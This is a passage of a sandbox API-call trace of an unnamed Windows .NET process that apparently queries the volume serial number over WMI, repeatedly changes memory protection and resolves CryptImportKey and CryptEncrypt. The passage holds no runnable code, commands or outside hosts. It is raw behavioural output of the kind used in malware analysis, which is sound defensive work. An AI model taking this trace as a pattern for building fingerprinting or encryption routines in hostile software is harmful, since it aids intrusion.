OldAccessProtection=0x41e50c | out: BaseAddress=0x41e4d4*=0x76e41000, NumberOfBytesToProtect=0x41e4d8, OldAccessProtection=0x41e50c*=0x20) returned 0x0 [0108.570] GetCurrentProcess () returned 0xffffffff [0108.570] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e4d4*=0x76e41308, NumberOfBytesToProtect=0x41e4d8, NewAccessProtection=0x20, OldAccessProtection=0x41e50c | out: BaseAddress=0x41e4d4*=0x76e41000, NumberOfBytesToProtect=0x41e4d8, OldAccessProtection=0x41e50c*=0x4) returned 0x0 [0108.571] GetCurrentProcess () returned 0xffffffff [0108.571] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e4d4*=0x76e4132c, NumberOfBytesToProtect=0x41e4d8, NewAccessProtection=0x4, OldAccessProtection=0x41e50c | out: BaseAddress=0x41e4d4*=0x76e41000, NumberOfBytesToProtect=0x41e4d8, OldAccessProtection=0x41e50c*=0x20) returned 0x0 [0108.571] GetCurrentProcess () returned 0xffffffff [0108.571] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e4d4*=0x76e4132c, NumberOfBytesToProtect=0x41e4d8, NewAccessProtection=0x20, OldAccessProtection=0x41e50c | out: BaseAddress=0x41e4d4*=0x76e41000, NumberOfBytesToProtect=0x41e4d8, OldAccessProtection=0x41e50c*=0x4) returned 0x0 [0108.572] GetCurrentProcess () returned 0xffffffff [0108.572] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e4d4*=0x76e41390, NumberOfBytesToProtect=0x41e4d8, NewAccessProtection=0x4, OldAccessProtection=0x41e50c | out: BaseAddress=0x41e4d4*=0x76e41000, NumberOfBytesToProtect=0x41e4d8, OldAccessProtection=0x41e50c*=0x20) returned 0x0 [0108.572] GetCurrentProcess () returned 0xffffffff [0108.572] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e4d4*=0x76e41390, NumberOfBytesToProtect=0x41e4d8, NewAccessProtection=0x20, OldAccessProtection=0x41e50c | out: BaseAddress=0x41e4d4*=0x76e41000, NumberOfBytesToProtect=0x41e4d8, OldAccessProtection=0x41e50c*=0x4) returned 0x0 [0108.575] GetProcAddress (hModule=0x76e40000, lpProcName=0x11b) returned 0x76e473fd [0108.581] GetProcAddress (hModule=0x76e40000, lpProcName=0x11c) returned 0x76e4742e [0108.671] GetCurrentThreadId () returned 0xba4 [0108.671] ResetEvent (hEvent=0xb8) returned 1 [0108.671] GetCurrentThreadId () returned 0xba4 [0108.671] GetCurrentThreadId () returned 0xba4 [0108.671] GetCurrentThreadId () returned 0xba4 [0108.671] GetCurrentThreadId () returned 0xba4 [0108.671] ResetEvent (hEvent=0xb8) returned 1 [0108.671] GetCurrentThreadId () returned 0xba4 [0108.671] GetCurrentThreadId () returned 0xba4 [0108.671] SetEvent (hEvent=0xbc) returned 1 [0108.671] SetEvent (hEvent=0xb8) returned 1 [0108.671] CloseHandle (hObject=0x44c) returned 1 [0108.677] GetProcAddress (hModule=0x76d30000, lpProcName="RegOpenKeyExW") returned 0x76d42311 [0108.679] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6720ba0, puCount=0x41eb44 | out: puCount=0x41eb44*=0x2) returned 0x0 [0108.679] WbemDefPath:IWbemPath:GetText (in: This=0x6720ba0, lFlags=4, puBuffLength=0x41eb40*=0x0, pszText=0x0 | out: puBuffLength=0x41eb40*=0xf, pszText=0x0) returned 0x0 [0108.679] WbemDefPath:IWbemPath:GetText (in: This=0x6720ba0, lFlags=4, puBuffLength=0x41eb40*=0xf, pszText="00000000000000" | out: puBuffLength=0x41eb40*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0108.680] SysReAllocStringLen (in: pbstr=0x41e398*=0x0, psz="OLEAUT32.dll", len=0xc | out: pbstr=0x41e398*="OLEAUT32.dll") returned 1 [0108.680] CharLowerBuffW (in: lpsz="OLEAUT32.dll", cchLength=0xc | out: lpsz="oleaut32.dll") returned 0xc [0108.680] LoadLibraryExW (lpLibFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\OLEAUT32.dll", hFile=0x0, dwFlags=0x8) returned 0x0 [0108.681] GetLastError () returned 0x7e [0108.681] SetLastError (dwErrCode=0x7e) [0108.681] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0xb21ba4, cbMultiByte=12, lpWideCharStr=0x41d874, cchWideChar=2047 | out: lpWideCharStr="OLEAUT32.dll\x01") returned 12 [0108.681] SysReAllocStringLen (in: pbstr=0x41e878*=0x0, psz="OLEAUT32.dll", len=0xc | out: pbstr=0x41e878*="OLEAUT32.dll") returned 1 [0108.681] CharLowerBuffW (in: lpsz="OLEAUT32.dll", cchLength=0xc | out: lpsz="oleaut32.dll") returned 0xc [0108.681] LoadLibraryExA (lpLibFileName="OLEAUT32.dll", hFile=0x0, dwFlags=0x0) returned 0x76e40000 [0108.682] GetLastError () returned 0x0 [0108.682] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e864*=0x76e41238, NumberOfBytesToProtect=0x41e868, NewAccessProtection=0x4, OldAccessProtection=0x41e89c | out: BaseAddress=0x41e864*=0x76e41000, NumberOfBytesToProtect=0x41e868, OldAccessProtection=0x41e89c*=0x20) returned 0x0 [0108.682] GetCurrentProcess () returned 0xffffffff [0108.682] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e864*=0x76e41238, NumberOfBytesToProtect=0x41e868, NewAccessProtection=0x20, OldAccessProtection=0x41e89c | out: BaseAddress=0x41e864*=0x76e41000, NumberOfBytesToProtect=0x41e868, OldAccessProtection=0x41e89c*=0x4) returned 0x0 [0108.683] GetCurrentProcess () returned 0xffffffff [0108.683] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e864*=0x76e41258, NumberOfBytesToProtect=0x41e868, NewAccessProtection=0x4, OldAccessProtection=0x41e89c | out: BaseAddress=0x41e864*=0x76e41000, NumberOfBytesToProtect=0x41e868, OldAccessProtection=0x41e89c*=0x20) returned 0x0 [0108.683] GetCurrentProcess () returned 0xffffffff [0108.683] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e864*=0x76e41258, NumberOfBytesToProtect=0x41e868, NewAccessProtection=0x20, OldAccessProtection=0x41e89c | out: BaseAddress=0x41e864*=0x76e41000, NumberOfBytesToProtect=0x41e868, OldAccessProtection=0x41e89c*=0x4) returned 0x0 [0108.684] GetCurrentProcess () returned 0xffffffff [0108.684] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e864*=0x76e41260, NumberOfBytesToProtect=0x41e868, NewAccessProtection=0x4, OldAccessProtection=0x41e89c | out: BaseAddress=0x41e864*=0x76e41000, NumberOfBytesToProtect=0x41e868, OldAccessProtection=0x41e89c*=0x20) returned 0x0 [0108.684] GetCurrentProcess () returned 0xffffffff [0108.684] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e864*=0x76e41260, NumberOfBytesToProtect=0x41e868, NewAccessProtection=0x20, OldAccessProtection=0x41e89c | out: BaseAddress=0x41e864*=0x76e41000, NumberOfBytesToProtect=0x41e868, OldAccessProtection=0x41e89c*=0x4) returned 0x0 [0108.684] GetCurrentProcess () returned 0xffffffff [0108.684] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e864*=0x76e41268, NumberOfBytesToProtect=0x41e868, NewAccessProtection=0x4, OldAccessProtection=0x41e89c | out: BaseAddress=0x41e864*=0x76e41000, NumberOfBytesToProtect=0x41e868, OldAccessProtection=0x41e89c*=0x20) returned 0x0 [0108.685] GetCurrentProcess () returned 0xffffffff [0108.685] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e864*=0x76e41268, NumberOfBytesToProtect=0x41e868, NewAccessProtection=0x20, OldAccessProtection=0x41e89c | out: BaseAddress=0x41e864*=0x76e41000, NumberOfBytesToProtect=0x41e868, OldAccessProtection=0x41e89c*=0x4) returned 0x0 [0108.685] GetCurrentProcess () returned 0xffffffff [0108.685] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e864*=0x76e412c4, NumberOfBytesToProtect=0x41e868, NewAccessProtection=0x4, OldAccessProtection=0x41e89c | out: BaseAddress=0x41e864*=0x76e41000, NumberOfBytesToProtect=0x41e868, OldAccessProtection=0x41e89c*=0x20) returned 0x0 [0108.686] GetCurrentProcess () returned 0xffffffff [0108.686] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e864*=0x76e412c4, NumberOfBytesToProtect=0x41e868, NewAccessProtection=0x20, OldAccessProtection=0x41e89c | out: BaseAddress=0x41e864*=0x76e41000, NumberOfBytesToProtect=0x41e868, OldAccessProtection=0x41e89c*=0x4) returned 0x0 [0108.686] GetCurrentProcess () returned 0xffffffff [0108.686] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e864*=0x76e412cc, NumberOfBytesToProtect=0x41e868, NewAccessProtection=0x4, OldAccessProtection=0x41e89c | out: BaseAddress=0x41e864*=0x76e41000, NumberOfBytesToProtect=0x41e868, OldAccessProtection=0x41e89c*=0x20) returned 0x0 [0108.686] GetCurrentProcess () returned 0xffffffff [0108.687] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e864*=0x76e412cc, NumberOfBytesToProtect=0x41e868, NewAccessProtection=0x20, OldAccessProtection=0x41e89c | out: BaseAddress=0x41e864*=0x76e41000, NumberOfBytesToProtect=0x41e868, OldAccessProtection=0x41e89c*=0x4) returned 0x0 [0108.687] GetCurrentProcess () returned 0xffffffff [0108.687] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e864*=0x76e41300, NumberOfBytesToProtect=0x41e868, NewAccessProtection=0x4, OldAccessProtection=0x41e89c | out: BaseAddress=0x41e864*=0x76e41000, NumberOfBytesToProtect=0x41e868, OldAccessProtection=0x41e89c*=0x20) returned 0x0 [0108.687] GetCurrentProcess () returned 0xffffffff [0108.687] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e864*=0x76e41300, NumberOfBytesToProtect=0x41e868, NewAccessProtection=0x20, OldAccessProtection=0x41e89c | out: BaseAddress=0x41e864*=0x76e41000, NumberOfBytesToProtect=0x41e868, OldAccessProtection=0x41e89c*=0x4) returned 0x0 [0108.688] GetCurrentProcess () returned 0xffffffff [0108.688] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e864*=0x76e41308, NumberOfBytesToProtect=0x41e868, NewAccessProtection=0x4, OldAccessProtection=0x41e89c | out: BaseAddress=0x41e864*=0x76e41000, NumberOfBytesToProtect=0x41e868, OldAccessProtection=0x41e89c*=0x20) returned 0x0 [0108.688] GetCurrentProcess () returned 0xffffffff [0108.688] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e864*=0x76e41308, NumberOfBytesToProtect=0x41e868, NewAccessProtection=0x20, OldAccessProtection=0x41e89c | out: BaseAddress=0x41e864*=0x76e41000, NumberOfBytesToProtect=0x41e868, OldAccessProtection=0x41e89c*=0x4) returned 0x0 [0108.689] GetCurrentProcess () returned 0xffffffff [0108.689] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e864*=0x76e4132c, NumberOfBytesToProtect=0x41e868, NewAccessProtection=0x4, OldAccessProtection=0x41e89c | out: BaseAddress=0x41e864*=0x76e41000, NumberOfBytesToProtect=0x41e868, OldAccessProtection=0x41e89c*=0x20) returned 0x0 [0108.689] GetCurrentProcess () returned 0xffffffff [0108.689] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e864*=0x76e4132c, NumberOfBytesToProtect=0x41e868, NewAccessProtection=0x20, OldAccessProtection=0x41e89c | out: BaseAddress=0x41e864*=0x76e41000, NumberOfBytesToProtect=0x41e868, OldAccessProtection=0x41e89c*=0x4) returned 0x0 [0108.689] GetCurrentProcess () returned 0xffffffff [0108.689] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e864*=0x76e41390, NumberOfBytesToProtect=0x41e868, NewAccessProtection=0x4, OldAccessProtection=0x41e89c | out: BaseAddress=0x41e864*=0x76e41000, NumberOfBytesToProtect=0x41e868, OldAccessProtection=0x41e89c*=0x20) returned 0x0 [0108.690] GetCurrentProcess () returned 0xffffffff [0108.690] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e864*=0x76e41390, NumberOfBytesToProtect=0x41e868, NewAccessProtection=0x20, OldAccessProtection=0x41e89c | out: BaseAddress=0x41e864*=0x76e41000, NumberOfBytesToProtect=0x41e868, OldAccessProtection=0x41e89c*=0x4) returned 0x0 [0108.691] IWbemClassObject:Get (in: This=0x672efb0, wszName="VolumeSerialNumber", lFlags=0, pVal=0x41eb40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3472190*=0, plFlavor=0x3472194*=0 | out: pVal=0x41eb40*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3472190*=8, plFlavor=0x3472194*=0) returned 0x0 [0108.691] GetProcAddress (hModule=0x76e40000, lpProcName=0x95) returned 0x76e446a5 [0108.691] SysStringByteLen (bstr="9C354B42") returned 0x10 [0108.691] SysStringByteLen (bstr="9C354B42") returned 0x10 [0108.691] IWbemClassObject:Get (in: This=0x672efb0, wszName="VolumeSerialNumber", lFlags=0, pVal=0x41eb48*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3472190*=8, plFlavor=0x3472194*=0 | out: pVal=0x41eb48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3472190*=8, plFlavor=0x3472194*=0) returned 0x0 [0108.691] SysStringByteLen (bstr="9C354B42") returned 0x10 [0108.692] SysStringByteLen (bstr="9C354B42") returned 0x10 [0108.717] GetProcAddress (hModule=0x75240000, lpProcName="CryptImportKey") returned 0x752451dd [0108.721] GetProcAddress (hModule=0x75240000, lpProcName="CryptEncrypt") returned 0x75245368 [0108.736] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67209c0, puCount=0x41ebb4 | out: puCount=0x41ebb4*=0x2) returned 0x0 [0108.736] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x41ebb0*=0x0, pszText=0x0 | out: puBuffLength=0x41ebb0*=0xf, pszText=0x0) returned 0x0 [0108.736] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x41ebb0*=0xf, pszText="00000000000000" | out: puBuffLength=0x41ebb0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0108.736] CoGetObjectContext (in: riid=0x346e308*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x41eb40 | out: ppv=0x41eb40*=0x72015c) returned 0x0 [0108.736] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x41eb38 | out: pAptType=0x41eb38*=1) returned 0x0 [0108.736] IUnknown:QueryInterface (in: This=0x72015c, riid=0x346e2f0*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x41eb3c | out: ppvObject=0x41eb3c*=0x0) returned 0x80004002 [0108.736] IUnknown:Release (This=0x72015c) returned 0x1 [0108.737] CoGetClassObject (in: rclsid=0x7588d4*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x41e760 | out: ppv=0x41e760*=0x6720d70) returned 0x0 [0108.737] WbemLocator:IUnknown:QueryInterface (in: This=0x6720d70, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x41e978 | out: ppvObject=0x41e978*=0x0) returned 0x80004002 [0108.738] WbemLocator:IClassFactory:CreateInstance (in: This=0x6720d70, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e98c | out: ppvObject=0x41e98c*=0x6720a80) returned 0x0 [0108.738] WbemLocator:IUnknown:Release (This=0x6720d70) returned 0x0 [0108.738] WbemLocator:IUnknown:QueryInterface (in: This=0x6720a80, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e5ac | out: ppvObject=0x41e5ac*=0x6720a80) returned 0x0 [0108.738] WbemLocator:IUnknown:QueryInterface (in: This=0x6720a80, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x41e568 | out: ppvObject=0x41e568*=0x0) returned 0x80004002 [0108.738] WbemLocator:IUnknown:AddRef (This=0x6720a80) returned 0x3 [0108.738] WbemLocator:IUnknown:QueryInterface (in: This=0x6720a80, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x41dec4 | out: ppvObject=0x41dec4*=0x0) returned 0x80004002 [0108.738] WbemLocator:IUnknown:QueryInterface (in: This=0x6720a80, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x41de74 | out: ppvObject=0x41de74*=0x0) returned 0x80004002 [0108.738] WbemLocator:IUnknown:QueryInterface (in: This=0x6720a80, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41de80 | out: ppvObject=0x41de80*=0x0) returned 0x80004002 [0108.738] CoGetContextToken (in: pToken=0x41dee0 | out: pToken=0x41dee0) returned 0x0 [0108.738] CoGetContextToken (in: pToken=0x41e2e8 | out: pToken=0x41e2e8) returned 0x0 [0108.738] WbemLocator:IUnknown:QueryInterface (in: This=0x6720a80, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e378 | out: ppvObject=0x41e378*=0x0) returned 0x80004002 [0108.738] WbemLocator:IUnknown:Release (This=0x6720a80) returned 0x2 [0108.738] WbemLocator:IUnknown:Release (This=0x6720a80) returned 0x1 [0108.738] CoGetContextToken (in: pToken=0x41e958 | out: pToken=0x41e958) returned 0x0 [0108.739] CoGetContextToken (in: pToken=0x41e8b8 | out: pToken=0x41e8b8) returned 0x0 [0108.739] WbemLocator:IUnknown:QueryInterface (in: This=0x6720a80, riid=0x41e988*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x41e984 | out: ppvObject=0x41e984*=0x6720a80) returned 0x0 [0108.739] WbemLocator:IUnknown:AddRef (This=0x6720a80) returned 0x3 [0108.739] WbemLocator:IUnknown:Release (This=0x6720a80) returned 0x2 [0108.739] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67209c0, puCount=0x41eb1c | out: puCount=0x41eb1c*=0x2) returned 0x0 [0108.739] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=8, puBuffLength=0x41eb18*=0x0, pszText=0x0 | out: puBuffLength=0x41eb18*=0xf, pszText=0x0) returned 0x0 [0108.739] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=8, puBuffLength=0x41eb18*=0xf, pszText="00000000000000" | out: puBuffLength=0x41eb18*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0108.739] CoCreateInstance (in: rclsid=0x745f1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x745f12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x41e9f4 | out: ppv=0x41e9f4*=0x6720a90) returned 0x0 [0108.739] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6720a90, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x41ea88 | out: ppNamespace=0x41ea88*=0x672f58c) returned 0x0 [0108.769] WbemLocator:IUnknown:QueryInterface (in: This=0x672f58c, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e924 | out: ppvObject=0x41e924*=0x77160c) returned 0x0 [0108.769] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x77160c, pProxy=0x672f58c, pAuthnSvc=0x41e974, pAuthzSvc=0x41e970, pServerPrincName=0x41e968, pAuthnLevel=0x41e96c, pImpLevel=0x41e95c, pAuthInfo=0x41e960, pCapabilites=0x41e964 | out: pAuthnSvc=0x41e974*=0xa, pAuthzSvc=0x41e970*=0x0, pServerPrincName=0x41e968, pAuthnLevel=0x41e96c*=0x6, pImpLevel=0x41e95c*=0x2, pAuthInfo=0x41e960, pCapabilites=0x41e964*=0x1) returned 0x0 [0108.769] WbemLocator:IUnknown:Release (This=0x77160c) returned 0x1 [0108.769] WbemLocator:IUnknown:QueryInterface (in: This=0x672f58c, riid=0x745f10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e918 | out: ppvObject=0x41e918*=0x77162c) returned 0x0 [0108.769] WbemLocator:IUnknown:QueryInterface (in: This=0x672f58c, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e914 | out: ppvObject=0x41e914*=0x77160c) returned 0x0 [0108.769] WbemLocator:IClientSecurity:SetBlanket (This=0x77160c, pProxy=0x672f58c, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0108.770] WbemLocator:IUnknown:Release (This=0x77160c) returned 0x2 [0108.770] WbemLocator:IUnknown:Release (This=0x77162c) returned 0x1 [0108.770] CoTaskMemFree (pv=0x758b08) [0108.770] WbemLocator:IUnknown:Release (This=0x6720a90) returned 0x0 [0108.770] WbemLocator:IUnknown:QueryInterface (in: This=0x672f58c, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e514 | out: ppvObject=0x41e514*=0x77162c) returned 0x0 [0108.770] WbemLocator:IUnknown:QueryInterface (in: This=0x77162c, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x41e4d0 | out: ppvObject=0x41e4d0*=0x0) returned 0x80004002 [0108.771] WbemLocator:IUnknown:QueryInterface (in: This=0x77162c, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x41e2ec | out: ppvObject=0x41e2ec*=0x0) returned 0x80004002 [0108.771] WbemLocator:IUnknown:AddRef (This=0x77162c) returned 0x3 [0108.771] WbemLocator:IUnknown:QueryInterface (in: This=0x77162c, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x41de2c | out: ppvObject=0x41de2c*=0x0) returned 0x80004002 [0108.771] WbemLocator:IUnknown:QueryInterface (in: This=0x77162c, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x41dddc | out: ppvObject=0x41dddc*=0x0) returned 0x80004002 [0108.771] WbemLocator:IUnknown:QueryInterface (in: This=0x77162c, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41dde8 | out: ppvObject=0x41dde8*=0x77158c) returned 0x0 [0108.772] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x77158c, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x41ddf0 | out: pCid=0x41ddf0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0108.772] WbemLocator:IUnknown:Release (This=0x77158c) returned 0x3 [0108.772] CoGetContextToken (in: pToken=0x41de48 | out: pToken=0x41de48) returned 0x0 [0108.772] CoGetContextToken (in: pToken=0x41e250 | out: pToken=0x41e250) returned 0x0 [0108.772] WbemLocator:IUnknown:QueryInterface (in: This=0x77162c, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e2e0 | out: ppvObject=0x41e2e0*=0x771614) returned 0x0 [0108.772] WbemLocator:IRpcOptions:Query (in: This=0x771614, pPrx=0x77162c, dwProperty=2, pdwValue=0x41e308 | out: pdwValue=0x41e308) returned 0x80004002 [0108.772] WbemLocator:IUnknown:Release (This=0x771614) returned 0x3 [0108.772] WbemLocator:IUnknown:Release (This=0x77162c) returned 0x2 [0108.772] CoGetContextToken (in: pToken=0x41e828 | out: pToken=0x41e828) returned 0x0 [0108.772] CoGetContextToken (in: pToken=0x41e788 | out: pToken=0x41e788) returned 0x0 [0108.772] WbemLocator:IUnknown:QueryInterface (in: This=0x77162c, riid=0x41e858*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x41e854 | out: ppvObject=0x41e854*=0x672f58c) returned 0x0 [0108.772] WbemLocator:IUnknown:AddRef (This=0x672f58c) returned 0x4 [0108.772] WbemLocator:IUnknown:Release (This=0x672f58c) returned 0x3 [0108.772] WbemLocator:IUnknown:Release (This=0x672f58c) returned 0x2 [0108.772] SysStringLen (param_1=0x0) returned 0x0 [0108.773] CoGetContextToken (in: pToken=0x41e820 | out: pToken=0x41e820) returned 0x0 [0108.773] WbemLocator:IUnknown:AddRef (This=0x77162c) returned 0x3 [0108.773] 